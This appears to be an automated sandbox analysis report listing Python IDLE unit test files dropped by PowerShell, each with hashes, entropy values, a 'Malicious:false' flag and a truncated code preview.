                                                                                                    Preview:"Test mainmenu, coverage 100%."..# Reported as 88%; mocking turtledemo absence would have no point.....from idlelib import mainmenu..import re..import unittest......class MainMenuTest(unittest.TestCase):.... def test_menudefs(self):.. actual = [item[0] for item in mainmenu.menudefs].. expect = ['file', 'edit', 'format', 'run', 'shell',.. 'debug', 'options', 'window', 'help'].. self.assertEqual(actual, expect).... def test_default_keydefs(self):.. self.assertGreaterEqual(len(mainmenu.default_keydefs), 50).... def test_tcl_indexes(self):.. # Test tcl patterns used to find menuitem to alter... # On failure, change pattern here and in function(s)... # Patterns here have '.*' for re instead of '*' for tcl... for menu, pattern in (.. ('debug', '.*tack.*iewer'), # PyShell.debug_menu_postcommand.. ('options', '.*ode.*ontext'), # EW.__init__, CodeContext.toggle..... ('options', '
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1365
                                                                                                    Entropy (8bit):4.5603243299598475
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:jggJlrIB7zgGMSU25KmyHckwVOORWcQhVZal:j1JlrIBXjqckwVPYcQhVZal
                                                                                                    MD5:320F0D0C1BFE5CB13AD808C29AAFE634
                                                                                                    SHA1:EEFCD010BA1C91CEF904439CF11D2B6F58074825
                                                                                                    SHA-256:8B3A166FD7EDD5DA37F5FA2E7D078BAC71CF8A2D6BB51DF17878FEEBD1C5EF7E
                                                                                                    SHA-512:F620C49F65B65E9EE5E0A515E8310DB9D36B0DD8C94BAE5357D8AE7BC1DB2C9F941857E2449F69A08765392FA0A99C30972EA651698672CE16ACBD925BC9255B
                                                                                                    Malicious:false
                                                                                                    Preview:"Test multicall, coverage 33%."....from idlelib import multicall..import unittest..from test.support import requires..from tkinter import Tk, Text......class MultiCallTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.mc = multicall.MultiCallCreator(Text).... @classmethod.. def tearDownClass(cls):.. del cls.mc.. cls.root.update_idletasks()..## for id in cls.root.tk.call('after', 'info'):..## cls.root.after_cancel(id) # Need for EditorWindow... cls.root.destroy().. del cls.root.... def test_creator(self):.. mc = self.mc.. self.assertIs(multicall._multicall_dict[Text], mc).. self.assertTrue(issubclass(mc, Text)).. mc2 = multicall.MultiCallCreator(Text).. self.assertIs(mc, mc2).... def test_init(self):.. mctext = self.mc(self.root).. self.assertIsInstance(mctext._MultiCall
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5583
                                                                                                    Entropy (8bit):4.543987072851069
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:LnirI04CKX3yK3Fz7F9D/cvDG8bGEP/i17fkB9yjPuB4k:rAaZ3tZt/cblJi1jkB9yjE4k
                                                                                                    MD5:A5E7531382C9BD9C0640EB183F9EA02F
                                                                                                    SHA1:12C8F4629FD8ECC4C76606AF02F53223FBD9F09D
                                                                                                    SHA-256:31C1E56158DC7BBFAAB81937FEA7373CE99282FBB64CDD2386D749F3ED1D6595
                                                                                                    SHA-512:23E630FABD8CF8EB0E9FAE2F9865EFE9E1CB812E3E5F811B0A2765B25A8BC9369C0DFAC59EEA47C2FB845A50852E25780FDD8BA022A3E2C9ABE768A3DB33EA31
                                                                                                    Malicious:false
                                                                                                    Preview:"Test outwin, coverage 76%."....from idlelib import outwin..import unittest..from test.support import requires..from tkinter import Tk, Text..from idlelib.idle_test.mock_tk import Mbox_func..from idlelib.idle_test.mock_idle import Func..from unittest import mock......class OutputWindowTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. root = cls.root = Tk().. root.withdraw().. w = cls.window = outwin.OutputWindow(None, None, None, root).. cls.text = w.text = Text(root).... @classmethod.. def tearDownClass(cls):.. cls.window.close().. del cls.text, cls.window.. cls.root.destroy().. del cls.root.... def setUp(self):.. self.text.delete('1.0', 'end').... def test_ispythonsource(self):.. # OutputWindow overrides ispythonsource to always return False... w = self.window.. self.assertFalse(w.ispythonsource('test.txt')).. self.assertFalse(w.ispyth
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3656
                                                                                                    Entropy (8bit):4.456325977318014
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:RcK/BR/srfODplCEfVCEc846T1oCt3Oit7qZ/CPqk:RcKJRWmhfVj46T1oCt3rUZ/CPqk
                                                                                                    MD5:017C85E53B01C0002E6C963406E44E0F
                                                                                                    SHA1:171AB9C80CBEA0E33E4E22C59FAE84CC47D5DEFF
                                                                                                    SHA-256:D41411DFE26AFE7F3302029333C7C9B896ABFE96E68EC991DF6EBB61DAFF408F
                                                                                                    SHA-512:8FEF530BE8BABB03BEDF4412D3A7D71ADE333D02219EAA15B0391EBDC26A2994A0416179BFE74EC3ACE51D4AFDE95BA3EC55008949724C7628DA62B071DE9024
                                                                                                    Malicious:false
                                                                                                    Preview:"""Test parenmatch, coverage 91%.....This must currently be a gui test because ParenMatch methods use..several text methods not defined on idlelib.idle_test.mock_tk.Text..."""..from idlelib.parenmatch import ParenMatch..from test.support import requires..requires('gui')....import unittest..from unittest.mock import Mock..from tkinter import Tk, Text......class DummyEditwin:.. def __init__(self, text):.. self.text = text.. self.indentwidth = 8.. self.tabwidth = 8.. self.prompt_last_line = '>>>' # Currently not used by parenmatch.......class ParenMatchTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().. cls.root.withdraw().. cls.text = Text(cls.root).. cls.editwin = DummyEditwin(cls.text).. cls.editwin.text_frame = Mock().... @classmethod.. def tearDownClass(cls):.. del cls.text, cls.editwin.. cls.root.update_idletasks().. cls.root.destroy().. del cls.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2508
                                                                                                    Entropy (8bit):4.66766218107638
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:PBrISq5Qh7XqFYLPwhFWHdrVIqYZPtdbBqvbnMNlpNIVgab:PBrISq5Qh7OYKlTIGC
                                                                                                    MD5:CEADEED30F1A4566330E1742AFCB0635
                                                                                                    SHA1:0736B3473DA9E07E31C8C2521C9C555FE88C714F
                                                                                                    SHA-256:7396A4069A03423F2C6C5AD62D92C742D17DF0E3F2E7F66839FF111958ED1BF1
                                                                                                    SHA-512:0548C466B4F2153D36C06C29D6E3755B59B82E9B66ADC940D56D0BC68E35067612B47BFA8C5040929059BB98796A55FD341A74E0D53217259EE4949DA81D0A2E
                                                                                                    Malicious:false
                                                                                                    Preview:"Test pathbrowser, coverage 95%."....from idlelib import pathbrowser..import unittest..from test.support import requires..from tkinter import Tk....import os.path..import pyclbr # for _modules..import sys # for sys.path....from idlelib.idle_test.mock_idle import Func..import idlelib # for __file__..from idlelib import browser..from idlelib.tree import TreeNode......class PathBrowserTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.pb = pathbrowser.PathBrowser(cls.root, _utest=True).... @classmethod.. def tearDownClass(cls):.. cls.pb.close().. cls.root.update_idletasks().. cls.root.destroy().. del cls.root, cls.pb.... def test_init(self):.. pb = self.pb.. eq = self.assertEqual.. eq(pb.master, self.root).. eq(pyclbr._modules, {}).. self.assertIsInstance(pb.node, TreeNode).. self.assertIsNotNone(b
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4183
                                                                                                    Entropy (8bit):4.495927423981778
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ATrfLFyYvd4GGUmcYmIjDEtTlxgg7Xbt92LxFKjk:85BxuGXD2LLKjk
                                                                                                    MD5:63576CF82D16BC8FE9A2DFED627956D1
                                                                                                    SHA1:0AA75CFAD63E6B2C2729881F73909690DA36C5BD
                                                                                                    SHA-256:348ED04617A2937915B9C594792D5DBDB3EDAC826380DA206FD54FF1ABC556B5
                                                                                                    SHA-512:8CCE6DB2F08F1DFF465D82C13DBD7EEB826D235CF026C7CBA3F71C2AEC8A98847A8FD0E40E211ADE030EF499DABAE1A57BC56ED984771CEC67B7746EB51451A7
                                                                                                    Malicious:false
                                                                                                    Preview:"Test percolator, coverage 100%."....from idlelib.percolator import Percolator, Delegator..import unittest..from test.support import requires..requires('gui')..from tkinter import Text, Tk, END......class MyFilter(Delegator):.. def __init__(self):.. Delegator.__init__(self, None).... def insert(self, *args):.. self.insert_called_with = args.. self.delegate.insert(*args).... def delete(self, *args):.. self.delete_called_with = args.. self.delegate.delete(*args).... def uppercase_insert(self, index, chars, tags=None):.. chars = chars.upper().. self.delegate.insert(index, chars).... def lowercase_insert(self, index, chars, tags=None):.. chars = chars.lower().. self.delegate.insert(index, chars).... def dont_insert(self, index, chars, tags=None):.. pass......class PercolatorTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().. cls.text = Text(cls.root).
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19848
                                                                                                    Entropy (8bit):4.374072305945841
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:S3SlrdYdM21WBfAtuS7Nq1gaz1m+ZMRfG:XGyBfAtnNqkRfG
                                                                                                    MD5:FA8A1DD6FE8BD377B135BB048D0E2440
                                                                                                    SHA1:3AFC0C73B818EB3D959FD9EC5463BD9F829DF4D9
                                                                                                    SHA-256:232FE6760557664952185C669A444C0E16042FA28BE2D293D595214E011562A7
                                                                                                    SHA-512:6C6B9F2234023C85634CC304EEC2A628A759AC4D177D485001297967E04F76A6B963663CF5DA270920F5501BCA9676357F2439DB05F9F73D4EB49EDFEC444101
                                                                                                    Malicious:false
                                                                                                    Preview:"Test pyparse, coverage 96%."....from idlelib import pyparse..import unittest..from collections import namedtuple......class ParseMapTest(unittest.TestCase):.... def test_parsemap(self):.. keepwhite = {ord(c): ord(c) for c in ' \t\n\r'}.. mapping = pyparse.ParseMap(keepwhite).. self.assertEqual(mapping[ord('\t')], ord('\t')).. self.assertEqual(mapping[ord('a')], ord('x')).. self.assertEqual(mapping[1000], ord('x')).... def test_trans(self):.. # trans is the production instance of ParseMap, used in _study1.. parser = pyparse.Parser(4, 4).. self.assertEqual('\t a([{b}])b"c\'d\n'.translate(pyparse.trans),.. 'xxx(((x)))x"x\'x\n')......class PyParseTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.parser = pyparse.Parser(indentwidth=4, tabwidth=4).... @classmethod.. def tearDownClass(cls):.. del cls.parser.... def test_init(self):.. self.assertEqual(
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5113
                                                                                                    Entropy (8bit):4.646725736531097
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5dDrIrW2aW/KGiMCYhAZ51x5p5NEBqb7clNjNR3ZNqE/Xbjab57O8k:590anGiMthAZ51x5p5NEBqb7clNjNR3v
                                                                                                    MD5:6016EC47319908CA883766932B6E8370
                                                                                                    SHA1:77A1F96DCDCAC4DAA1DD10A20877F2948403F11F
                                                                                                    SHA-256:E42604612BB73083E184CD79801B2EE7A24DD11F0BE0242E88B7CFE0F392B7EE
                                                                                                    SHA-512:0C43ED9689E729CBE2770286B91D4C19CBCD214BA01D79F7491D3D337E0FAB480F66C62C384AE05CBFE44B73E027E9CA45F98AD4E0A6989CE4366EAAFAB7D40E
                                                                                                    Malicious:false
                                                                                                    Preview:"Test pyshell, coverage 12%."..# Plus coverage of test_warning. Was 20% with test_openshell.....from idlelib import pyshell..import unittest..from test.support import requires..from tkinter import Tk......class FunctionTest(unittest.TestCase):.. # Test stand-alone module level non-gui functions..... def test_restart_line_wide(self):.. eq = self.assertEqual.. for file, mul, extra in (('', 22, ''), ('finame', 21, '=')):.. width = 60.. bar = mul * '='.. with self.subTest(file=file, bar=bar):.. file = file or 'Shell'.. line = pyshell.restart_line(width, file).. eq(len(line), width).. eq(line, f"{bar+extra} RESTART: {file} {bar}").... def test_restart_line_narrow(self):.. expect, taglen = "= RESTART: Shell", 16.. for width in (taglen-1, taglen, taglen+1):.. with self.subTest(width=width):.. self.assertEqual(pyshell.restart_line(width, '
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15905
                                                                                                    Entropy (8bit):4.65685275514465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:VyVGFv7ZCbTjx4hs8+JmvYP2axRsgmmwqd/mmauq9O8dafo7+HZ5FXMyKXPGHXsz:kVGhVCb533lvGWHZ5G8c/1gmhpI/kFhp
                                                                                                    MD5:3D7F5D30CC6AEFAAF0A69FBB3D190178
                                                                                                    SHA1:1B659188CC80E4BC212A3C90E8E6CFD2DCDC2132
                                                                                                    SHA-256:18C9E88B30136AB683DAE039DAE45E6BBAAE36F046CFD3A0A6A6CB8F278C2C89
                                                                                                    SHA-512:5C957544557CB3BFBA9C46C0A595252474C35A4234879C9C68207480BED31135AB31E28835609BE909B902D4368605F7C7FCA5CD82FFB43C5CA2D1005BA564E5
                                                                                                    Malicious:false
                                                                                                    Preview:"""Test query, coverage 93%.....Non-gui tests for Query, SectionName, ModuleName, and HelpSource use..dummy versions that extract the non-gui methods and add other needed..attributes. GUI tests create an instance of each class and simulate..entries and button clicks. Subclass tests only target the new code in..the subclass definition.....The appearance of the widgets is checked by the Query and..HelpSource htests. These are run by running query.py..."""..from idlelib import query..import unittest..from test.support import requires..from tkinter import Tk, END....import sys..from unittest import mock..from idlelib.idle_test.mock_tk import Var......# NON-GUI TESTS....class QueryTest(unittest.TestCase):.. "Test Query base class.".... class Dummy_Query:.. # Test the following Query methods... entry_ok = query.Query.entry_ok.. ok = query.Query.ok.. cancel = query.Query.cancel.. # Add attributes and initialization needed for tests... def __i
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4298
                                                                                                    Entropy (8bit):4.55533292909318
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:CSrIHitHR05vMluK9IsurJo8agTCcs3nxkja9q1ZMAk:LDRSvMlu0InrJo8agTVoxkja9MHk
                                                                                                    MD5:4FD9C7E842E0FDBC4DDBCA1149080C46
                                                                                                    SHA1:A8C49EE6CECB6B7113B51D37C3E2EFF78943B6A4
                                                                                                    SHA-256:A44739A76B90077C3649192293FBCA7159CBA8A0FC88C6C09E39A92A565BDC58
                                                                                                    SHA-512:8F7D2E5BDD577A59E66C0D0DAA5FA38320A7CE87640FCCD11C395CA114521A7C0D434E5EFC8CE3FECAA40C5E8B54726FF7869E98ADD77EE287ED8C6C29BF954E
                                                                                                    Malicious:false
                                                                                                    Preview:"Test redirector, coverage 100%."....from idlelib.redirector import WidgetRedirector..import unittest..from test.support import requires..from tkinter import Tk, Text, TclError..from idlelib.idle_test.mock_idle import Func......class InitCloseTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().. cls.text = Text(cls.root).... @classmethod.. def tearDownClass(cls):.. del cls.text.. cls.root.destroy().. del cls.root.... def test_init(self):.. redir = WidgetRedirector(self.text).. self.assertEqual(redir.widget, self.text).. self.assertEqual(redir.tk, self.text.tk).. self.assertRaises(TclError, WidgetRedirector, self.text).. redir.close() # restore self.tk, self.text.... def test_close(self):.. redir = WidgetRedirector(self.text).. redir.register('insert', Func).. redir.close().. self.assertE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8593
                                                                                                    Entropy (8bit):4.439568328388032
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:smVhY8Ud8/WhxPT0ai1PI9cbPXPVPPUu+PZ7ejVQLJDk:sfdDjPThi1PI9cbPXPVPcu+PxejYJw
                                                                                                    MD5:646DC5C35073018DA41B1630C41DF4A2
                                                                                                    SHA1:F384A4872F77CF31BE0D471DF8B12037E358C4C7
                                                                                                    SHA-256:A39710F9F13103BCE5E9A31A4C968F26F77943E886A21EC8DB385911CF6AA959
                                                                                                    SHA-512:6C8A05D793796DB678C34FF8174AB73FB70B6D6FA4EA92956686A43BCB61655232D937AFA00572BBE651C0F65BDAAC92A92376DD5478A44E14C489FFA98D09E7
                                                                                                    Malicious:false
                                                                                                    Preview:"Test replace, coverage 78%."....from idlelib.replace import ReplaceDialog..import unittest..from test.support import requires..requires('gui')..from tkinter import Tk, Text....from unittest.mock import Mock..from idlelib.idle_test.mock_tk import Mbox..import idlelib.searchengine as se....orig_mbox = se.messagebox..showerror = Mbox.showerror......class ReplaceDialogTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().. cls.root.withdraw().. se.messagebox = Mbox.. cls.engine = se.SearchEngine(cls.root).. cls.dialog = ReplaceDialog(cls.root, cls.engine).. cls.dialog.bell = lambda: None.. cls.dialog.ok = Mock().. cls.text = Text(cls.root).. cls.text.undo_block_start = Mock().. cls.text.undo_block_stop = Mock().. cls.dialog.text = cls.text.... @classmethod.. def tearDownClass(cls):.. se.messagebox = orig_mbox.. del cls.text, cls.dialog, cls.engine.. cl
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):834
                                                                                                    Entropy (8bit):4.589054047199901
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:urShTnecjLUeirwHdKM5Jkc3+01x7nEKdq23ZrWmQO/QJKssJkcC46ry02aLJv:urSdeqUy9KM/kC+IxY673ZCY1sgkTQal
                                                                                                    MD5:E5126FFAAC83318469D687670470B909
                                                                                                    SHA1:EF8832CC7E2C94BE276B598456E654E3441361DC
                                                                                                    SHA-256:38E3BB1648CAB509BE226A34405F1BB6FB477EA215BF1121E08C745469FB9A0F
                                                                                                    SHA-512:89B900D67685CC8573FBDCFF08A09BB3B9464DD6851594643A919783CF53688843BA0C618989CA54582ED098DC31BB494235E30AE7CA52E3E6EFC46D6902813D
                                                                                                    Malicious:false
                                                                                                    Preview:"Test rpc, coverage 20%."....from idlelib import rpc..import unittest........class CodePicklerTest(unittest.TestCase):.... def test_pickle_unpickle(self):.. def f(): return a + b + c.. func, (cbytes,) = rpc.pickle_code(f.__code__).. self.assertIs(func, rpc.unpickle_code).. self.assertIn(b'test_rpc.py', cbytes).. code = rpc.unpickle_code(cbytes).. self.assertEqual(code.co_names, ('a', 'b', 'c')).... def test_code_pickler(self):.. self.assertIn(type((lambda:None).__code__),.. rpc.CodePickler.dispatch_table).... def test_dumps(self):.. def f(): pass.. # The main test here is that pickling code does not raise... self.assertIn(b'test_rpc.py', rpc.dumps(f.__code__))......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16186
                                                                                                    Entropy (8bit):4.624998372220666
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:rlrmvdTCadwRyRdHPUieDdMTphfV3/HRiWF0mZHrUfzEPMbBe:rlqBNvUieDdMTphfV3/HRiWF5
                                                                                                    MD5:14A59C57774004E153D6CE98DE85BD00
                                                                                                    SHA1:F8DC344FDCDA82137BF2228C13E1EA466F676593
                                                                                                    SHA-256:A626E21BC2E4A716B002F7AFE60A28222FB515A09258B5140159957AA69B385B
                                                                                                    SHA-512:A184604E12B04D913FACA32F2312B7A17768A15722A26D19EA4834E538A862AB18B82D56104C87F9493D8338056D7A8E05C8291D4D67F8B43F2E74C402985874
                                                                                                    Malicious:false
                                                                                                    Preview:"Test run, coverage 54%."....from idlelib import run..import io..import sys..from test.support import captured_output, captured_stderr..import unittest..from unittest import mock..import idlelib..from idlelib.idle_test.mock_idle import Func....idlelib.testing = True # Use {} for executing test user code.......class ExceptionTest(unittest.TestCase):.... def test_print_exception_unhashable(self):.. class UnhashableException(Exception):.. def __eq__(self, other):.. return True.... ex1 = UnhashableException('ex1').. ex2 = UnhashableException('ex2').. try:.. raise ex2 from ex1.. except UnhashableException:.. try:.. raise ex1.. except UnhashableException:.. with captured_stderr() as output:.. with mock.patch.object(run, 'cleanup_traceback') as ct:.. ct.side_effect = lambda t, e: t.. run.print_exception
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):810
                                                                                                    Entropy (8bit):4.591537338338638
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:FLJhTl0rRpHoRjrz1hjBexXGispqj7ze4XjrRkea2NZHhYHGHQK2N7Dc02aLJv:pJ8rIXJB6X7zlHRg2fKmH8D6al
                                                                                                    MD5:089CF1F5A5E55A269A99C71BDDFFD89A
                                                                                                    SHA1:7EE9AC782A1259364AD6744DC59E58CAFFE6010F
                                                                                                    SHA-256:C39FF558C4B3DAA525FBBBF1AA21F9DDBDF85B8EC1F8A9B70DC5B23E3F787809
                                                                                                    SHA-512:ECB2B0E5D073214F84179271FD57E42C0725052A77A1619D8E09B24CEB085A598697459CE1DA2CCD5D0C4C36B445CD1E57E8CECD713ECDEAD91AFC437D2DF735
                                                                                                    Malicious:false
                                                                                                    Preview:"Test runscript, coverage 16%."....from idlelib import runscript..import unittest..from test.support import requires..from tkinter import Tk..from idlelib.editor import EditorWindow......class ScriptBindingTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().. cls.root.withdraw().... @classmethod.. def tearDownClass(cls):.. cls.root.update_idletasks().. for id in cls.root.tk.call('after', 'info'):.. cls.root.after_cancel(id) # Need for EditorWindow... cls.root.destroy().. del cls.root.... def test_init(self):.. ew = EditorWindow(root=self.root).. sb = runscript.ScriptBinding(ew).. ew._close()......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):523
                                                                                                    Entropy (8bit):4.618711056645856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:PhJeRpH7CkLRjrzEpKP4XjrHGEt02aLJv:PirbjLfyHmOal
                                                                                                    MD5:D681A059805CD3913F3E68F7609F8DCB
                                                                                                    SHA1:47B589290032E17BB7E26D26DBFCE0E2C422058C
                                                                                                    SHA-256:7B63939B3D15478A401E9496991D75BE3A7ED8A4414858A08BB277206B0620D9
                                                                                                    SHA-512:868C34C5DD78BC9D2B5996F3BBA0B146B16DB82841FF8E5D280D51662A9F83544624F79560DD75052D48BA44314DEC1EA28AE1A39173B0CCEC9AF5139C7D5EC7
                                                                                                    Malicious:false
                                                                                                    Preview:"Test scrolledlist, coverage 38%."....from idlelib.scrolledlist import ScrolledList..import unittest..from test.support import requires..requires('gui')..from tkinter import Tk......class ScrolledListTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().... @classmethod.. def tearDownClass(cls):.. cls.root.destroy().. del cls.root...... def test_init(self):.. ScrolledList(self.root)......if __name__ == '__main__':.. unittest.main(verbosity=2)..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2539
                                                                                                    Entropy (8bit):4.615322855613091
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:x8rfL9cRRKEhrGcbb3DQK4+h3b3gmhij+hifhivhclRhKCGzprpNm8ai:x8rfL9QKEhrGcbjn4+Jjgmcj+cfcvul8
                                                                                                    MD5:7AA63B4AA5002DB21314F0115C86F6DF
                                                                                                    SHA1:B4BB3B8D6133FBCEB90F35D03C1709C5AE066AE0
                                                                                                    SHA-256:CEFE25B6190417849C1B47CBA06D47EC1BE2CC7740BE00D03DD8AA5D68970A7B
                                                                                                    SHA-512:9B69207B21157181A2B08B37EDF0579205ABB77239BEA57B5B6DDD3C0F25A67479F8CD11330223C22CE7AEEA6E6D32059E5EAFE6AFD7EE230139878A4C257EDE
                                                                                                    Malicious:false
                                                                                                    Preview:"Test search, coverage 69%."....from idlelib import search..import unittest..from test.support import requires..requires('gui')..from tkinter import Tk, Text, BooleanVar..from idlelib import searchengine....# Does not currently test the event handler wrappers...# A usage test should simulate clicks and check highlighting...# Tests need to be coordinated with SearchDialogBase tests..# to avoid duplication.......class SearchDialogTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. cls.root = Tk().... @classmethod.. def tearDownClass(cls):.. cls.root.destroy().. del cls.root.... def setUp(self):.. self.engine = searchengine.SearchEngine(self.root).. self.dialog = search.SearchDialog(self.root, self.engine).. self.dialog.bell = lambda: None.. self.text = Text(self.root).. self.text.insert('1.0', 'Hello World!').... def test_find_again(self):.. # Search for various expressions.. text = sel
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5851
                                                                                                    Entropy (8bit):4.553889103667144
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:gsrIL4Ek8U6pAB6kE9TcaIDMGg+5r/GviF9nUJHUy9/yVgvzorvlF6Uh49ag4vmt:gOgU6q5E9TcdDMGg+5r/GviF9nUJHUyX
                                                                                                    MD5:93827D8D2682087E0803CF425ACAC7F3
                                                                                                    SHA1:4F0263B37FC750E67679957ABFAA00B6CCBEF389
                                                                                                    SHA-256:A57AAC6C593C3FBA1FD99839B0AA8B5A064143BFDF5771E356583877026DB204
                                                                                                    SHA-512:933A79A2CD937D9C1D0F204E5164CAE26109AB0BA17498892980E31F3F47273F60AFE8FC4E26CDCCEBA4B137847BD9E18648DAD767F88FD0A9EB4C8FEBA00CA4
                                                                                                    Malicious:false
                                                                                                    Preview:"Test searchbase, coverage 98%."..# The only thing not covered is inconsequential --..# testing skipping of suite when self.needwrapbutton is false.....import unittest..from test.support import requires..from tkinter import Text, Tk, Toplevel..from tkinter.ttk import Frame..from idlelib import searchengine as se..from idlelib import searchbase as sdb..from idlelib.idle_test.mock_idle import Func..## from idlelib.idle_test.mock_tk import Var....# The ## imports above & following could help make some tests gui-free...# However, they currently make radiobutton tests fail...##def setUpModule():..## # Replace tk objects used to initialize se.SearchEngine...## se.BooleanVar = Var..## se.StringVar = Var..##..##def tearDownModule():..## se.BooleanVar = BooleanVar..## se.StringVar = StringVar......class SearchDialogBaseTest(unittest.TestCase):.... @classmethod.. def setUpClass(cls):.. requires('gui').. cls.root = Tk().... @classmethod.. def tearDownClass
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11920
                                                                                                    Entropy (8bit):4.629421233745114
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:vM4e9N7EVKOoRwQ1j7IEpIi7c9ZN1BlBYjG2Z2eqI7/jfnKiCZAttDIPopb6GGV+:04m7Yr6XpIi7c9ZN1BlBYjG2Z2eqI7/r
                                                                                                    MD5:2784FBD31BE29423242C6ABD3799F612
                                                                                                    SHA1:82FFB2CB2B519ADA9978B48590FB1F0E5656002D
                                                                                                    SHA-256:CD1CA903CF5F79683BEA784DA0157659F0B12BACA04F5D54EA49957F2089EF5B
                                                                                                    SHA-512:4697FD570AF780AF9A2B1A6417EE77C0010302D9AB1FCFAD977C152F0CF48BD721AB0012AD6D741C04156B11535384B84C952DA69032DCA113FD2C86E793F15B
                                                                                                    Malicious:false
                                                                                                    Preview:"Test searchengine, coverage 99%."....from idlelib import searchengine as se..import unittest..# from test.support import requires..from tkinter import BooleanVar, StringVar, TclError # ,Tk, Text..from tkinter import messagebox..from idlelib.idle_test.mock_tk import Var, Mbox..from idlelib.idle_test.mock_tk import Text as mockText..import re....# With mock replacements, the module does not use any gui widgets...# The use of tk.Text is avoided (for now, until mock Text is improved)..# by patching instances with an index function returning what is needed...# This works because mock Text.get does not use .index...# The tkinter imports are used to restore searchengine.....def setUpModule():.. # Replace s-e module tkinter imports other than non-gui TclError... se.BooleanVar = Var.. se.StringVar = Var.. se.messagebox = Mbox....def tearDownModule():.. # Restore 'just in case', though other tests should also replace... se.BooleanVar = BooleanVar.. se.StringVar = StringVa
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
